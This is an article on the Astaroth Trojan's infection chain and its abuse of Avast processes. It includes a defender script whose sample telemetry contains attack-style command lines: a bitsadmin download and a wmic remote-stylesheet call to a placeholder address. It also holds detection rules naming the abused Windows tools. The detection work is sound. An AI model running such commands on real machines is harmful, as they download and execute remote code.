Astaroth, a strain of Trojan malware, was discovered targeting Brazilian and European countries, gaining access to devices by abusing legitimate applications and even anti-malware software to bypass firewalls. The security company Cybereason found the strain and published a post on its blog explaining how Astaroth works.
The malware spreads mostly through email attachments and hyperlinks, loading malicious modules onto the device that monitor the user and send information back to the attackers. Among other things, these modules log keystrokes, intercept operating system calls, continuously harvest whatever is saved to the clipboard, and collect the user's saved passwords for various accounts.
Cybereason says this kind of malware can be fatal for organizations that lack visibility into their own digital environment. The company writes that
“[b]ecause of the great potential for malicious exploitation inherent in the use of native processes, it is very likely that many other information stealers will adopt this method to deliver their payload into targeted machines.”
Astaroth is a Trojan strain that was first discovered in 2017. It is remarkably ingenious, using the system's own built-in processes to bypass firewall and software protections. Once the user opens the attachment or hyperlink, a .7zip archive is dropped onto the device and Windows BITSAdmin is used to download the payload. The payload includes a .lnk file, which launches wmic.exe. From there, the malware carries out an XSL script processing attack. By relying on native applications, it hides the full scope of the damage being done.
After connecting to a C2 server, information starts flowing to the attacker while the malware simultaneously downloads additional applications that further the infection. To bypass the anti-malware giant Avast, Astaroth injects an aswrundll.exe file onto the device. The file is disguised as Avast's Software Runtime Dynamic Link Library, which is how it evades Avast's scans. The malware is also designed to abuse the unins000.exe security-software process should Avast Anti-Virus not be installed on the infected device.
While you can follow the standard steps used to avoid scams and malware, it's difficult to combat something that bypasses one of the most widely used anti-virus products in the world. If you suspect something is infecting your device, look through the list of running processes for anything you don't recognize. Keep the personal information on your computer behind a password or two-factor authentication to further protect sensitive data.
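The advice to look through running processes can be automated against process-creation telemetry. The following is an added example, not code from the article or from Cybereason, that runs a handful of defender heuristics matching the chain described above over a few constructed process-creation events: bitsadmin.exe fetching a payload over HTTP, wmic.exe started directly from explorer.exe (what a double-clicked .lnk looks like) with a remote stylesheet passed via its real /format: switch, and a file named aswrundll.exe running from outside the Avast install directory or being spawned by a living-off-the-land binary. The JSON-lines event shape, the rule names, the user name, the documentation address 198.51.100.7 and the assumed Avast install path are all this example's own choices.

```python
import json
import ntpath
from typing import Dict, List

# Constructed process-creation events in a simple JSON-lines shape
# (timestamp, full image path, parent image path, command line).
# Invented for this example: the user name and the 198.51.100.7 address
# are placeholders, not real indicators.
SAMPLE_EVENTS = r"""
{"ts": "2019-02-11T09:01:02", "image": "C:\\Windows\\explorer.exe", "parent": "C:\\Windows\\System32\\userinit.exe", "cmd": "explorer.exe"}
{"ts": "2019-02-11T09:03:10", "image": "C:\\Windows\\System32\\bitsadmin.exe", "parent": "C:\\Windows\\System32\\cmd.exe", "cmd": "bitsadmin /transfer job1 http://198.51.100.7/update.7z C:\\Users\\ana\\AppData\\Local\\Temp\\update.7z"}
{"ts": "2019-02-11T09:03:41", "image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "parent": "C:\\Windows\\explorer.exe", "cmd": "wmic os get /format:\"http://198.51.100.7/s.xsl\""}
{"ts": "2019-02-11T09:05:00", "image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "parent": "C:\\Windows\\System32\\cmd.exe", "cmd": "wmic logicaldisk get size,freespace"}
{"ts": "2019-02-11T09:05:13", "image": "C:\\Users\\ana\\AppData\\Local\\Temp\\aswrundll.exe", "parent": "C:\\Windows\\System32\\wbem\\WMIC.exe", "cmd": "aswrundll.exe"}
{"ts": "2019-02-11T09:06:30", "image": "C:\\Program Files\\Avast Software\\Avast\\aswrundll.exe", "parent": "C:\\Program Files\\Avast Software\\Avast\\AvastSvc.exe", "cmd": "aswrundll.exe"}
"""

# Assumption: a default Avast installation lives in this directory.
AVAST_DIR = r"c:\program files\avast software\avast"
# Native Windows binaries the article describes being abused to download and run the payload.
LOLBINS = {"wmic.exe", "bitsadmin.exe"}
# Security-product process names the article says Astaroth impersonates or abuses.
SECURITY_NAMES = {"aswrundll.exe", "unins000.exe"}


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def parse_events(text: str) -> List[Dict]:
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events: List[Dict]) -> List[Dict]:
    """Apply each heuristic to every event; one finding per rule that fires."""
    findings = []
    for ev in events:
        img, parent, cmd = _base(ev["image"]), _base(ev["parent"]), ev["cmd"].lower()
        hits = []
        # BITSAdmin pulling a file from the network, as in the article's download stage.
        if img == "bitsadmin.exe" and "/transfer" in cmd and "http" in cmd:
            hits.append("bitsadmin_download")
        # WMIC asked to render with a stylesheet fetched from a URL or an .xsl file
        # (the XSL script processing step the article mentions).
        if img == "wmic.exe" and "/format:" in cmd and ("http" in cmd or ".xsl" in cmd):
            hits.append("wmic_remote_xsl")
        # WMIC launched straight from the shell is what a double-clicked .lnk looks like.
        if img == "wmic.exe" and parent == "explorer.exe":
            hits.append("wmic_launched_from_explorer")
        # Avast's runtime binary name appearing outside Avast's own directory.
        if img == "aswrundll.exe" and ntpath.dirname(ev["image"]).lower() != AVAST_DIR:
            hits.append("aswrundll_outside_avast_dir")
        # A security-named process whose parent is one of the abused native tools.
        if img in SECURITY_NAMES and parent in LOLBINS:
            hits.append("security_binary_spawned_by_lolbin")
        for rule in hits:
            findings.append({"rule": rule, "ts": ev["ts"], "image": ev["image"], "cmd": ev["cmd"]})
    return findings


def scan(text: str = SAMPLE_EVENTS) -> List[Dict]:
    """Convenience wrapper: parse then detect."""
    return detect(parse_events(text))


def rules_fired(text: str = SAMPLE_EVENTS) -> List[str]:
    """Sorted list of rule names that fired, useful for a quick summary."""
    return sorted(f["rule"] for f in scan(text))


if __name__ == "__main__":
    for f in scan():
        print(f'{f["ts"]} {f["rule"]:34} {f["image"]}')
```

On the sample above the legitimate Avast process and the administrator's plain `wmic logicaldisk` query produce nothing, while the download, the stylesheet-driven WMIC launch and the misplaced aswrundll.exe each produce findings. The path check is deliberately narrow to the assumed install directory; on a fleet with non-default installs it should be replaced by a signature or hash check on the binary itself.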
There are a few ways to rid yourself of Astaroth if you are one of the unlucky ones to have picked up the digital parasite. Because the program has no graphical user interface (GUI), there is no way to uninstall it directly from the device. Users need an anti-malware program (Spyhunter, Reimage, or Malwarebytes are good options) to scan for the files and remove them. If the program can't be downloaded directly onto the infected device, download it on an uninfected PC, copy it to a USB stick, and install it on the infected device from there.
While Astaroth has so far been contained to Brazil and Europe, the efficiency and speed with which it has developed are more than enough to prove its viability. It may become more prominent in the time to come, as hackers develop more creative ways to manipulate and infect legitimate software in order to infect computers and crash unsuspecting systems.